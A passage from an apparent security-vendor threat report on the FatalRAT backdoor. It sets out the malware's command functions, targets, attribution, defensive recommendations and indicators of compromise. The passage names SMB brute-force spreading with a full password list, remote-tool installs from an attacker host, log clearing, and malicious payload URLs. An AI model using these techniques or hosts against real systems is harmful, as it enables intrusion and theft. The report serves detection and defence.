%appdata%\\Mozilla\\Firefox\\Profiles\\*.db command to delete Mozilla Firefox user profile data\r\n0x95 – Deletes the \\AppData\\Roaming\\360se6\\User Data\\Default folder\r\n0x96 – Deletes the \\AppData\\Local\\Tencent\\QQBrowser\\User Data\\Default folder\r\n0x97 – Deletes the \\AppData\\Roaming\\SogouExplorer folder\r\n0x98 – Starts processes: %AppData%\\run.exe -e -n d.rar, then starts svp7.exe and 1200.exe; the command is saved to the file C:\\ProgramData\\jy.lnk\r\n0x99 – Downloads UltraViewer from http://svp7[.]net:9874/UltraViewer.exe and installs it\r\n0x9A – Downloads AnyDesk from http://svp7[.]net:9874/AnyDesk.exe and runs it with the connection password 123456\r\n0x9C – Scans the network for Windows hosts with shared folders accessible over SMB and attempts to connect to them with the login Administrator and the following passwords: administrator, test, admin, guest, alex, home, love, xp, user, game, 123, nn, root, iDgvi, movie, time, yeah, money, xpuser, hack, password, 111, 123456, qwerty, test, abc123, memory, home, 12345678, bbbbbb, 88888, caonima, 5201314, 1314520, asdfgh, alex, angel, null, asdf, baby, woaini. If the connection succeeds, the malware tries to copy the executable of the process in whose context it is running to the admin$, C$, D$, E$ and F$ shares of the remote system under the name hackshen.exe and runs it.\r\n0 – Kills the specified process\r\n1 – Deletes the FatalRAT service and registry key\r\n2 – Sets the Remark key of the malware service to the value received from the C2 server\r\n3 – Sets the Group key of the malware service to the value received from the C2 server\r\n4 – Clears Windows event 
logs: Security, System and Application\r\n5 – Downloads and runs a file\r\n6 – Updates the malware: downloads a file and runs it as a service with the name Fatal\r\n7 – Moves a file\r\n8 – Opens the specified URL using Internet Explorer\r\n9 – Opens the specified URL using Internet Explorer with a hidden window\r\n0xA – Creates a file, writes data to it and runs it\r\n0xB – Creates the file %AppData%\\svp7.exe, writes data to it and runs %AppData%\\UAC.exe\r\n0xC – Creates the file %AppData%\\UAC.exe and writes data to it\r\n0xD – Shows a message to the user via the MessageBox API function\r\n0xE – Finds a process by name\r\n0xF – Finds windows by class name\r\n0x10 – Starts the proxy server\r\n0x11 – Stops the proxy server\r\n0x12 – Loads a plugin\r\nTargets\r\nAfter a thorough analysis of the malware, TTPs, infrastructure and other data associated with the attack, our investigation confirmed that the targets included government agencies and industrial enterprises in the following industries: manufacturing, construction, information technology, telecommunications, healthcare, power and energy, and large-scale logistics and transportation.\r\nWith few exceptions, all the attack targets are in the APAC region, primarily Taiwan, Malaysia, China, Japan, Thailand, South Korea, Singapore, the Philippines, Vietnam, and Hong Kong.\r\nIn some cases, the attack was specifically designed for Chinese-speaking targets, with the loaders masquerading as legitimate tax filing tools.\r\nThe statistics below are based on the first-stage loaders delivered to targets in various industries. 
Interestingly, some of the targets' machines were identified as engineering workstations or automation engineers' systems.\r\nFig. 19 Infected system distribution charts\r\nAbout the attackers\r\nThere is no clear consensus among researchers as to who is behind the attacks using FatalRAT. For example, ESET's report states that they do not attribute this activity to any known group. At the same time, in one of the first papers on FatalRAT, published by Trend Micro, the researchers concluded that this series of attacks is related to the activity of the Purple Fox botnet. In the same article, the researchers provided evidence of a connection between FatalRAT and another backdoor, Gh0st RAT, whose source code was previously leaked on GitHub.\r\nGiven the connection between these two backdoors, it is worth pointing out the publication of the Chinese research center Weibu. 
The infection chain and payload (Gh0st RAT) used in the attack described by Weibu suggest that the report covers another, perhaps earlier, series of attacks that shares a number of TTPs with the one we analyzed:\r\nMalware loaders were distributed via WeChat and disguised as financial documents.\r\nPublicly available services were used to host the files needed to run the malware.\r\nThe threat actor uses the “black and white” method (a legitimate “white” binary is made to load a malicious “black” DLL, i.e. DLL sideloading), so that the chain of events looks like normal activity.\r\nA large number of C2 server addresses are used, with the ability to change them dynamically.\r\nMalware configuration data often specifies non-standard ports for connecting to C2 servers.\r\nWeibu experts in their report also do not attribute the series of attacks they identified to any named group, so they assigned it a new name – Silver Fox. Interestingly, they also describe an approach to spreading Gh0st RAT via fake websites pushed up in search results through SEO manipulation. The same approach was reported by ESET for spreading FatalRAT. All these publications have similarities in tooling and described TTPs, and perhaps they all reflect different series of attacks that are somehow related.\r\nDuring our research, we were also unable to determine which known group this series of attacks belongs to, but we can assume with medium confidence that a Chinese-speaking threat actor is behind it. A number of indirect indicators point to this:\r\n1. Querying current services using registry keys and saving data in the Chinese date format.\r\n2. 
The legitimate software abused for DLL sideloading, in particular DriverAssistant.exe, was developed in Chinese.\r\n3. Abuse of legitimate regional cloud services: myqcloud.com to host malicious payloads and cloud note services such as Youdao to host infrastructure details (C2 addresses and payload locations).\r\n4. Language artifacts: the PDB paths mentioned above, the use of the Chinese version of MMC whose interface the malware loader supports (as the attackers placed MMC inside the second-stage loader, they could have used any version but chose a Chinese one), executable file metadata and the Fangao.dll resource language:\r\nFig. 20 First-stage loader metadata\r\nFig. 21 Second-stage loader resources metadata\r\nThe hypothesis of a connection between FatalRAT and Gh0st RAT may also be supported by overlaps in malicious infrastructure, for example:\r\nnbs2012.novadector[.]xyz, mentioned in the Weibu report, previously hosted, according to Kaspersky telemetry, a file with the MD5 hash 26D1F8CC33A7567463BFAEBC2242833C, which corresponds to the 0user.exe file we found in this attack.\r\n34.kosdage[.]asia, which was used as a FatalRAT C2 server, resolved to 43.155.73[.]235 on 2023-04-05 according to passive DNS history. This IP address has hosted malicious domains in the past, one of them api.youkesdt[.]asia, which was reported by Cofense as distributing the open-source Gh0st RAT. 
The Cofense researchers also do not draw conclusions about who was behind that series of attacks, but they do point out the similarity of the discovered techniques to those of the well-known Chinese-speaking APT27 group.\r\nConclusions\r\nWe repeatedly see threat actors using shared libraries, tools, and payloads, finding it convenient to reuse existing code and adapt it to their needs.\r\nAs malware authors become more sophisticated, relying solely on static indicators of compromise (IOCs) may be insufficient, as the attackers change them over time. To address this, we gathered all the samples we collected and looked for commonalities that would let us track them effectively. This allowed us to track these loaders based on shared code blocks, Rich headers, debug information and the TTPs observed throughout the execution flow.\r\nThis report serves as a warning to industrial organizations in the APAC region, alerting them to threat actors who have demonstrated the ability to gain access to OT-related systems. 
Being aware of such threats enables these organizations to bolster their security measures and respond proactively to protect their assets and data from malicious actors.\r\nDuring our research, we found that the attackers use a variety of methods to evade detection and blocking: dynamically changing C2 servers, placing files on legitimate web resources, abusing DLL sideloading in legitimate applications to launch malware, packing and encrypting files and network traffic, and much more.\r\nFatalRAT's functionality gives an attacker almost unlimited possibilities for developing an attack: spreading over the network, installing remote administration tools, manipulating devices, stealing and deleting confidential information, etc. Obviously, infection with this type of malware poses great risks, especially for industrial organizations like the ones we saw among the targets. After a comprehensive analysis of the attacker's tactics, techniques and procedures (TTPs) in the payloads and infrastructure, we are unable to link this activity to any known group. However, the consistent use of services and interfaces in Chinese at various stages of the attack, as well as other indirect evidence, indicates that a Chinese-speaking actor may be involved.\r\nRecommendations\r\nWe recommend taking the following measures to avoid falling victim to the attack described above:\r\n1. Train company employees to work securely with the internet, email, messengers and other communication channels. Specifically, explain the potential consequences of downloading and launching files from unverified sources. Emphasize vigilance against phishing emails and secure practices when working with archives.\r\n2. Configure filtering of content sent via email and set up multitier filtering of inbound email traffic. 
Consider using sandbox solutions designed to automatically test attachments in inbound email traffic; make sure your sandbox solution is configured not to skip emails from “trusted” sources, including partner and contact organizations.\r\n3. Install up-to-date versions of centrally managed security solutions on all systems and update antivirus databases and program modules on a regular basis.\r\n4. Use dedicated protection for industrial processes. Kaspersky Industrial CyberSecurity protects industrial endpoints and enables network monitoring on the OT network to identify and block malicious activity.\r\n5. Implement application whitelisting so that only approved and digitally signed applications can run on your network. This minimizes the risk of the DLL sideloading techniques commonly exploited by threat actors, provided the policy covers DLLs as well as executables: in this campaign the malicious DLL is loaded by a legitimate executable, which an executable-only policy would allow to run.\r\n6. Check that all security solution components are enabled on all systems and that active policies prohibit disabling protection and terminating or removing solution components without entering the administrator password.\r\n7. Check that security solutions receive up-to-date threat information from Kaspersky Security Network for those groups of systems where the use of cloud security services is not prohibited by law or regulations.\r\n8. Check that license keys of Kaspersky security solutions have been distributed to all devices and that periodic system scanning tasks have been created for all device groups.\r\n9. Use EDR/XDR/MDR solutions to establish a baseline of the grandparent-parent-child process relationships commonly observed in OT environments. This is strongly recommended because the attackers run their malware through the functionality of legitimate programs, which shows up mainly as an anomalous process chain.\r\n10. 
Enable two-factor authentication for logging in to administration consoles and web interfaces of security solutions. In Kaspersky Security Center, for example, this can be done by following the product's instructions.\r\n11. Update operating systems and applications to versions currently supported by the vendors. Install the latest security updates (patches) for operating systems and applications.\r\n12. Deploy a SIEM system, for example, Kaspersky Unified Monitoring and Analysis Platform.\r\n13. Implement the following correlation rules in the SIEM system:\r\nNew services created on Windows-based systems.\r\nThe appearance of new applications in startup, in particular, monitoring the values of the Run registry keys (FatalRAT persists through the SVP7 value under HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run).\r\nThe appearance of new logon scripts on Windows-based systems.\r\nLogins of domain accounts to systems they have not logged into before.\r\nWindows event log clearing (FatalRAT command 4 clears the Security, System and Application logs).\r\nSecurity solutions being shut down.\r\nPassword brute force (multiple unsuccessful login attempts), including against SMB shares, as performed by FatalRAT command 0x9C.\r\nPort scanning of systems inside the enterprise network, as well as attempts to discover network shared folders.\r\nAttempts to communicate over non-standard ports for known protocols, such as TCP port 82 for HTTP requests (the C2 servers listed in the indicators below use ports 82, 6000, 8080 and 8081).\r\n14. Check that Active Directory policies include restrictions on user attempts to log in to systems. Users should be allowed to log in only to those systems to which access is required for them to perform their job responsibilities.\r\n15. Establish the following password complexity requirements in Active Directory group policies:\r\nPassword length: at least 12 characters for unprivileged accounts and 16 characters for privileged accounts.\r\nA password should contain uppercase letters, lowercase letters, digits, and special characters: (! @ # $ % ^ & * ( ) – _ + = ~ [ ] { } | \\ : ; ' \" < > , . ? 
/)\r\nA password should not contain dictionary words or the user's personal data that could be used to guess it, such as:\r\nthe user's name(s), telephone numbers, memorable dates (birthdays, etc.);\r\ncharacters located sequentially on the keyboard (“12345678”, “QWERTY”, etc.);\r\ncommon abbreviations and terms (“USER”, “TEST”, “ADMIN”, etc.). Note that the password list FatalRAT uses for SMB spreading (command 0x9C) consists of exactly such values: 123456, 12345678, qwerty, test, admin, password.\r\n16. Prohibit storing and sending passwords in plain text; use dedicated password management software to store and transfer passwords.\r\n17. Implement two-factor authentication for authorization (using RDP, SSH or other protocols) on systems that contain confidential data and systems that are critical to the organization's IT infrastructure, such as domain controllers.\r\n18. Use Active Directory group policies to restrict the execution of binaries signed with revoked digital signatures.\r\n19. Enhance network segmentation. Configure the networks of different divisions (as well as different enterprises) as separate segments. Limit data transfers between network segments to the minimal list of ports and protocols necessary for the organization's operations.\r\n20. Make it the responsibility of administrators to avoid using privileged accounts, except in cases where their duties can only be performed using these accounts. Whenever possible, restart a system after using a privileged account on it: this clears the credentials cached in memory so that they cannot be extracted with hacking utilities such as Mimikatz. It is also recommended to use different dedicated accounts to administer different groups of systems, such as databases.\r\n21. 
Segregate services related to maintaining the organization's information security into a dedicated segment and, if possible, a separate domain. Limit data transfers between that segment and the rest of the network to the minimal list of ports and protocols necessary to operate security solutions and perform monitoring to identify information security incidents.\r\n22. If remote access to systems in other network segments is required, set up demilitarized zones (DMZ) for communication between network segments and perform remote access via terminal servers.\r\n23. Configure the backup storage system to store backups on a separate server that is not part of the domain, and ensure that backup deletion and modification rights are held only by a dedicated account that is also not part of the domain. This measure helps protect backups in the event that the domain is compromised.\r\n24. Increase the frequency of backups to ensure that the failure of a server does not result in the loss of a critical volume of information.\r\n25. Store at least three backups for each server and other systems critical to the normal operation of the organization. In addition, at least one backup should be stored on a separate, offline data storage device.\r\n26. Use RAID arrays on servers where backups are stored. This will help improve the backup system's fault tolerance.\r\n27. Implement a procedure to periodically check the integrity and usability of backups. In addition, implement a procedure to periodically scan backups with an antimalware solution.\r\n28. 
Irrespective of whether there are signs of an information security incident or not, we recommend that you adjust\r\nthe Kaspersky Security Center settings in accordance with the best practices described in the Hardening Guide.\r\nIndicators of compromise\r\nMalicious attachments file names (original)\r\n通知.exe\r\n（税-务-新-系-统).EXE\r\n（税-务-新-系-统）.zip\r\n2023年国务院税务总局最新政策计划.rar\r\n（新-对-账-单）.zip\r\n(2023新-税-务-系-统）.zip\r\n税务总局关于补贴有关税收的公告.zip\r\n（税-务-新-系-统).zip\r\n单据 (2).zip\r\n2023税-务-新-系-统.zip\r\n关于企业单位调整增值税税率有关政策.rar\r\n电 子 发 票.zip\r\n税务局通知.zip\r\n1_1_2023年国务院税务总局最新政策计划.exe\r\n（税-务-新-系-统）.zip\r\n关于企业单位调整增值税税率有关政策.zip\r\n第三批税费优惠政策推出 .exe\r\n年度企业所得税汇缴补税尽量安排在5月份入库.zip\r\n关于企业单位调整增值税税率有关政策关于企业单位调整增值税税率有关政策.exe\r\n税前加计扣除新政指引(1).zip\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 30 of 37\n\n税务稽查抽查事项清单.rar\r\n税务局通知.zipqm\r\n关于企业新政策.rar\r\n第三批税费优惠政策推出.rar\r\n关于企业单位调整增值税税率有关政策.exe\r\n新政策-税务.rar\r\n政策三步骤.rar\r\nFiles hash (MD5)\r\n02fb1958a901d7d1c8b60ecc0e59207c – first stage loader\r\n033a8d6ec5a738a1a90dd4a86c7259c8 – first stage loader\r\n04aa425d86f4ef8dc4fc1509b195838a – first stage loader\r\n096c34df242562d278fc1578dc31df92 – first stage loader\r\n09a50edb49cbb59a34828a37e63be846 – first stage loader\r\n0a49345c77da210ab0cd031fda6bc962 – first stage loader\r\n0a70ea6596c92fbfb461909ed57503fa – first stage loader\r\n0b20f0ff1aaff4068f99f4db69ba9c1e – first stage loader\r\n0c33792c6ed37452f44ca94ce7385250 – first stage loader\r\n142eb5106fcc2f95b7daf37dca970595 – first stage loader\r\n15b7990bd006d857ee02c529b45783ac – first stage loader\r\n1c79abe9f52cbe92f042615a9f6b6f10 – first stage loader\r\n1e80a8b3f4efb4bb27771d729f5ced85 – first stage loader\r\n2026ead0c2366d049ecd5e42ac1b1b07 – first stage loader\r\n24ecb197ee73e5b1eef2ded592640cf2 – first stage loader\r\n26f0806932dfd029f0fe12e49bb4c799 – first stage 
loader\r\n28231ce260ce66388d58ce536d7ed201 – first stage loader\r\n2aa41ae3d3ae789147218652e6593161 – first stage loader\r\n2bccd50322afb7a349c163ce9b76bb66 – first stage loader\r\n357534f6a2bffa77b83501715e382a94 – first stage loader\r\n362fc5799ecef8e9e328cfbf6272c48f – first stage loader\r\n3843ef98a4c7ee88f10078e6a38f15ee – first stage loader\r\n3883957530482a399abb5e1f06e4581f – first stage loader\r\n3b32fc9115c224653f5afba793c0bbef – first stage loader\r\n3ca82fd8d12967c32388ad18e9727fac – first stage loader\r\n44b47fdab8ca3375fe5a875deefa265c – first stage loader\r\n4fc6dbb9beeecb2d60f3fef356c6df01 – first stage loader\r\n502054d938a18172a3657aaf2326bcf4 – first stage loader\r\n50a5c5a3c07f04d96f5f1968996cfb74 – first stage loader\r\n50d29ee29b54685bd10b8d2917696413 – first stage loader\r\n58a8daae643a84c112ddc6e79c750271 – first stage loader\r\n58e44c4d797cecfed42c1fdf18c2d5f9 – first stage loader\r\n58fe500e022ea1aeebbe72c4ce694531 – first stage loader\r\n5b730131c3271820c03d711f2549b894 – first stage loader\r\n5c1de870ea1e08b25e7ce4397372f5a6 – first stage loader\r\n5d7fba23a44683c0b471d9a7cc7f5042 – first stage loader\r\n632c0808e4d0c7b293642e4c4ae8e2a2 – first stage loader\r\n63562347202715eff0e7f2d6ad07a2aa – first stage loader\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 31 of 37\n\n63c600434def54157204765619838372 – first stage loader\r\n64013e613a0130cb1b7845139537bc5e – first stage loader\r\n64d72e8d0539e6a0b74fb1c6e5127c05 – first stage loader\r\n64fdeed776cfd5e260444ae2e4a5b1a4 – first stage loader\r\n699ad2a5b6d9b9b59df79e9265ebd47a – first stage loader\r\n6a5e3776c3bfdadd899704589f28e9fd – first stage loader\r\n6a73f3bab8fb205ed46e57cf076b6f6d – first stage loader\r\n7081b6781e66bdceb2b119a783b6c7fd – first stage loader\r\n771a5d8fc6829618f15abe49796d1c44 – first stage 
loader\r\n790cf080abb18af471d465998b37fd1b – first stage loader\r\n797d111244805e897db5c21010ee8e12 – first stage loader\r\n7ba376f5a71ffa21a92c7b35c3b000eb – first stage loader\r\n82394a97458094b1cb22c4e243f4e9db – first stage loader\r\n8c0599c0a6b7ffaff93762d0c3ea2569 – first stage loader\r\n8da2c4796c439f4a57536bd5c5d3f811 – first stage loader\r\n8e474f9321fc341770c9100853eb41eb – first stage loader\r\n9037ccfcd3d3d1542089d30d3041db1c – first stage loader\r\n936c16a64432348176f9183cd1524cef – first stage loader\r\n93f12cbfb9ba1a66d3a050a74bab690b – first stage loader\r\n949f086c40cfc5144243a24688961414 – first stage loader\r\n9636309c41e8a33507c349b8e9053c49 – first stage loader\r\n991cb5f8476edbc73223d1331704a9fd – first stage loader\r\n9bb22b91b5ad59972130a3a428f7b5bb – first stage loader\r\n9bf2e34511619b7c4573c3974bdbaa39 – first stage loader\r\n9e8a08fcddb10db8d58e17b544d81bff – first stage loader\r\na009b341aa6f5bda61300dc5e7822480 – first stage loader\r\na7b20338dd9ed5462ddff312b67556e9 – first stage loader\r\nab5f57681299933c1f70b938caa526d3 – first stage loader\r\nac3fbdbfbc08f41e4ad1c004180093f1 – first stage loader\r\nad216eaf11500eb73c6cdafc18cb49d8 – first stage loader\r\nae735b1d9b7e9dd496d22409ceaeda66 – first stage loader\r\nb0c315c5dcda6e4442280c07b11d1ba5 – first stage loader\r\nb1ad89be2632933350683b91011a4aee – first stage loader\r\nb37917ea3849607d02d330130a823567 – first stage loader\r\nb3f8f1272813bff80630b9caab6e5089 – first stage loader\r\nb5c46f829fed11b4ddc2e155dc5cf974 – first stage loader\r\nbc36b1be438f92fe5f9a47f13244503e – first stage loader\r\nbd6b8574738c7589887b61d4fad68fce – first stage loader\r\nbdd68e7733c09fad48d4642689741ea4 – first stage loader\r\nbe15a198f05eb39277720defa9188f62 – first stage loader\r\nc4579aa972d32e946752357ca56ee501 – first stage loader\r\nc555cc05f9d16b9e9222693e523e0ba5 – first stage loader\r\nc89a4a106619c67b8410efa695d78ef3 – first stage loader\r\nca7dc49e80b2a77677718c72f3cc6bc1 – first stage 
loader\r\ncbc36deadef17a4c315cbbff3f74439f – first stage loader\r\nd35635e8d07b923d1e89f541d4f03b90 – first stage loader\r\nd413cf08ef7c6357dd0215b8b9ebe6f4 – first stage loader\r\nd494efc086447c543d0c3c7beecf2bc6 – first stage loader\r\nd6bda8be4ba9563844b3b9367b73bd2e – first stage loader\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 32 of 37\n\ndc2676b0c54b31a017ada4f62693de54 – first stage loader\r\ndded5d108b6a9ee50d629148d8ed4ec5 – first stage loader\r\ndf6f5f4b7b8ba3c2c0ddc00d47e33218 – first stage loader\r\ne0d5b46dffee56c337fdc172ce617850 – first stage loader\r\ne32020ab02e11a995effb7781aabd92f – first stage loader\r\ne6ef56c91bd735542775dfef277e0cc7 – first stage loader\r\ne8204900e8acb502ca6e008f9532b35e – first stage loader\r\ne91991304abf5d881545bc127e7fb324 – first stage loader\r\neb9419aa5c6fee96defad140450a9633 – first stage loader\r\nec0bdf52c113487e803028dbc52e8173 – first stage loader\r\ned036740be0a8e3203a54edd4d4b735c – first stage loader\r\nf9e461cc83076d5f597855165e89f0db – first stage loader\r\nfdc35392af34ef43291b8f7f959ef501 – first stage loader\r\nfeb8e6059a234ea689404d3d4336e8af – first stage loader\r\n4e40c9945cc8b62c123e5636155e96a7 – configurator (before.dll)\r\n6bfe01cd9c038aa90bcd600d49657c21 – configurator (before.dll)\r\n80c7667c14df5b92ab206b2ea9b42aff – configurator (before.dll)\r\neb53df9fe23d469350885164aa82215e – configurator (before.dll)\r\n32c105c5229843aaebf12621359195a9 – second stage loader (fangao.dll)\r\n34b29454676e780d81d8bba066d7d94f – second stage loader (fangao.dll)\r\n8577438ecff5753ddcf427b93c5976c8 – second stage loader (fangao.dll)\r\nf481a67933055956e8dd77b4b2bde9ed – second stage loader (fangao.dll)\r\nf8136c909fb35457fc963d87b50bc158 – third stage loader (wke.dll)\r\n02477e031f776539c8118b8e0e6663b0 – FatalRAT final payload\r\n02d8c59e5e8a85a81ee75ce517609739 – FatalRAT 
final payload\r\n05c528a2b8bb20aad901c733d146d595 – FatalRAT final payload\r\n15962f79997a308ab3072c10e573e97c – FatalRAT final payload\r\n17278c3f4e8bf56d9c1054f67f19b82c – FatalRAT final payload\r\n172ee543d8a083177fc1832257f6d57d – FatalRAT final payload\r\n1fe3885dea6be2e1572d8c61e3910d19 – FatalRAT final payload\r\n249f568f8b8709591e7afd934ebea299 – FatalRAT final payload\r\n266bb19f9ceb1a4ccbf45577bbeaac1a – FatalRAT final payload\r\n3c583e01eddd0ea6fe59a89aea4503b4 – FatalRAT final payload\r\n3ec20285d88906336bd4119a74d977a0 – FatalRAT final payload\r\n43156787489e6aa3a853346cded3e67b – FatalRAT final payload\r\n46630065be23c229adff5e0ae5ca1f48 – FatalRAT final payload\r\n577e1a301e91440b920f24e7f6603d45 – FatalRAT final payload\r\n5be46b50cac057500ea3424be69bf73a – FatalRAT final payload\r\n60a92d76e96aaa0ec79b5081ddcc8a24 – FatalRAT final payload\r\n60dbc3ef17a50ea7726bdb94e96a1614 – FatalRAT final payload\r\n635f3617050e4c442f2cbd7f147c4dcf – FatalRAT final payload\r\n675a113cdbcce171e1ff172834b5f740 – FatalRAT final payload\r\n68a27f7ccbfa7d3b958fad078d37e299 – FatalRAT final payload\r\n73e49ddf4251924c66e3445a06250b10 – FatalRAT final payload\r\n787f2819d905d3fe684460143e01825c – FatalRAT final payload\r\n7ac3ebac032c4afd09e18709d19358ed – FatalRAT final payload\r\n8f67a7220d36d5c233fc70d6ecf1ee33 – FatalRAT final payload\r\n9b4d46177f24ca0a4881f0c7c83f5ef8 – FatalRAT final payload\r\n9c3f469a5b54fb2ec29ac7831780ed6d – FatalRAT final payload\r\nhttps://ics-cert.kaspersky.com/publications/reports/2025/02/24/fatalrat-attacks-in-apac-backdoor-delivered-via-an-overly-long-infection-chain-to-chinese-speaking-targets/\r\nPage 33 of 37\n\n9d34d83e4671aaf23ff3e61cb9daa115 – FatalRAT final payload\r\na935ef1151d45c7860bfe799424bea4b – FatalRAT final payload\r\nbcec6b78adb3cf966fab9025dacb0f05 – FatalRAT final payload\r\nd0d3efcff97ef59fe269c6ed5ebb06c9 – FatalRAT final payload\r\nebc0809580940e384207aa1704e5cc8e – FatalRAT final 
payload\r\neca08239da3acaf0d389886a9b91612a – FatalRAT final payload\r\ned6837f0e351aff09db3c8ee93fbcf06 – FatalRAT final payload\r\nfb8dc76a0cb0a5d32e787a1bb21f92d2 – FatalRAT final payload\r\nfeb49021233524bd64eb6ce37359c425 – FatalRAT final payload\r\nSecurity solutions verdicts\r\nBackdoor.Win32.Agent.myuolz\r\nBackdoor.Win32.Agent.myuomc\r\nBackdoor.Win32.Agent.myuomd\r\nBackdoor.Win32.Agent.myuomf\r\nBackdoor.Win32.Agent.myuomi\r\nBackdoor.Win32.Agent.myuoqw\r\nBackdoor.Win32.Agent.myuorl\r\nBackdoor.Win32.Agent.myuorw\r\nBackdoor.Win32.Agent.myuosj\r\nBackdoor.Win32.Agent.myuosk\r\nBackdoor.Win32.Agent.myuosm\r\nBackdoor.Win32.Agentb.ef\r\nTrojan.Win32.Agentb.lqfh\r\nTrojan.Win32.Agentb.lqfi\r\nTrojan.Win32.Agentb.lqfj\r\nTrojan.Win32.Agentb.lqfk\r\nTrojan.Win32.Agentb.lqfl\r\nTrojan.Win32.Agentb.lqfm\r\nTrojan.Win32.Zapchast.bkbi\r\nTrojan.Win32.Zapchast.bkbj\r\nTrojan.Win32.Zapchast.bkbk\r\nTrojan.Win32.Zapchast.bkbl\r\nTrojan.Win32.Zapchast.bkbm\r\nTrojan.Win32.Zapchast.bkbn\r\nTrojan.Win32.Zapchast.bkhr\r\nIP addresses\r\n101.33.243[.]31:82\r\n43.154.238[.]130:6000\r\n134.122.137[.]252:6000\r\n43.154.238[.]130:8081\r\n111.230.93[.]174:8081\r\n43.159.192[.]196:6000\r\n43.138.199[.]241:6000\r\n175.178.166[.]216:6000\r\n43.139.35[.]42:6000\r\n43.139.101[.]11:6000\r\n81.71.1[.]107:6000\r\n175.178.89[.]24:6000\r\n106.52.216[.]112:6000\r\n43.154.68[.]193:6000\r\n107.148.54[.]105:6000\r\n47.106.224[.]107:6000\r\n154.39.238[.]101:6000\r\n206.233.130[.]141:6000\r\n107.148.50[.]116:6000\r\n103.144.29[.]211:6000\r\n107.148.52[.]241:6000\r\n107.148.50[.]112:6000\r\n107.148.52[.]242:6000\r\n111.230.10[.]93:6000\r\n111.230.32[.]52:6000\r\n107.148.50[.]113:6000\r\n111.230.108[.]14:6000\r\n175.178.96[.]9:8081\r\n1.12.37[.]113:8081\r\n111.230.15[.]48:8081\r\n111.230.91[.]145:8081\r\n111.230.45[.]217:8081\r\n154.91.227[.]32:6000\r\n82.156.145[.]216:6000\r\n122.152.231[.]146:6000\r\n154.206.236[.]9:6000\r\n119.29.219[.]211:6000\r\n107.148.52[.]176:6000\r\n120.78.173[.]89:6000\r\n120.79.91[.]168:6000\r\n114.132.46[.]48:6000\r\n123.207.35[.]145:6000\r\n8.217.0[.]16:6000\r\n123.207.1[.]145:6000\r\n114.132.56[.]175:6000\r\n119.29.235[.]38:6000\r\n123.207.79[.]195:6000\r\n139.199.168[.]63:6000\r\n123.207.55[.]60:6000\r\n43.138.176[.]5:6000\r\n123.207.16[.]43:6000\r\n123.207.58[.]147:6000\r\n103.144.29[.]123:6000\r\n156.236.67[.]181:6000\r\n123.207.44[.]193:6000\r\n123.207.8[.]204:6000\r\n114.132.121[.]130:6000\r\n154.197.6[.]103:6000\r\n42.193.242[.]180:6000\r\n47.57.68[.]157:8080\r\nDomain 
names\r\nmicrosoftmiddlename[.]tk\r\ncloudservicesdevc[.]tk\r\nnovadector[.]xyz\r\nmicrosoftupdatesoftware[.]ga\r\n0a305ffb2a1d41f6870eac02f9afce89[.]xyz\r\nxindajiema[.]info\r\nVip033324[.]xyz\r\nmicrosoftmiddlename[.]tk\r\ncloudservicesdevc[.]tk\r\nnovadector[.]xyz\r\nmicrosoftupdatesoftware[.]ga\r\n101.kkftodesk101[.]top\r\n102.kkftodesk102[.]top\r\n104.kkftodesk104[.]top\r\n105.kkftodesk105[.]top\r\n106.kkftodesk106[.]top\r\n107.kkftodesk107[.]top\r\n108.kkftodesk108[.]top\r\n109.kkftodesk109[.]top\r\n110.kkftodesk110[.]top\r\n34.kosdage[.]asia\r\nURLs of malicious files on legitimate services\r\nhttp://note.youdao[.]com/yws/api/note/4b2eead06fc72ee2763ef1f653cdc4ae\r\nhttp://note.youdao[.]com/yws/api/note/1eaac14f58d9eff03cf8b0c76dcce913\r\nhttp://11-1318622059.cos.ap-nanjing.myqcloud[.]com/DLL2auto.dll\r\nhttp://11-1318622059.cos.ap-nanjing.myqcloud[.]com/DLL.dll\r\nhttp://11-1318622059.cos.ap-nanjing.myqcloud[.]com/DLL2.dll\r\nhttp://11-1318622059.cos.ap-nanjing.myqcloud[.]com/FANGAOtest.dll\r\nhttp://11-1318622059.cos.ap-nanjing.myqcloud[.]com/BEFORE.dll\r\nhttp://11-1318622059.cos.ap-nanjing.myqcloud[.]com/FANGAO.dll\r\nhttp://todesk-1316713808.cos.ap-nanjing.myqcloud[.]com/DLL.dll\r\nhttp://todesk-1316713808.cos.ap-nanjing.myqcloud[.]com/DLL2.dll\r\nhttp://todesk-1316713808.cos.ap-nanjing.myqcloud[.]com/BEFORE.dll\r\nhttp://mytodesktest-1257538800.cos.ap-nanjing.myqcloud[.]com/DLL.dll\r\nhttp://yuehai-1316713808.cos.ap-nanjing.myqcloud[.]com/DLL.dll\r\nhttp://yuehai-1316713808.cos.ap-nanjing.myqcloud[.]com/FANGAO.dll\r\nhttp://yuehai-1316713808.cos.ap-nanjing.myqcloud[.]com/before1/BEFORE.dll\r\nhttp://yuehai-1316713808.cos.ap-nanjing.myqcloud[.]com/before2/BEFORE.dll\r\nhttp://526-1316713808.cos.ap-nanjing.myqcloud[.]com/FANGAO.dll\r\nhttp://526-1316713808.cos.ap-nanjing.myqcloud[.]com/BEFORE.dll\r\nhttp://526-1316713808.cos.ap-nanjing.myqcloud[.]com/DLL2.dll\r\nhttp://526-1316713808.cos.ap-nanjing.myqcloud[.]com/DLL.dll\r\nhttp://529-1316713808.cos.ap-nanjing.myqcloud[.]com/BEFORE.dll\r\nhttp://529-1316713808.cos.ap-nanjing.myqcloud[.]com/DLL2.dll\r\nhttp://529-1316713808.cos.ap-nanjing.myqcloud[.]com/FANGAO.dll\r\nhttp://530-1316713808.cos.ap-nanjing.myqcloud[.]com/FANGAO.dll\r\nRegistry keys\r\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\SVP7\r\nFile path\r\nC:\\ProgramData\\KnGoe\r\nC:\\user0\r\nC:\\ProgramData\\8877\r\nC:\\Windows\\nw_elf.dll\r\nC:\\Windows\\Fatal.key\r\nC:\\ProgramData\\jy.lnk\r\nPDB 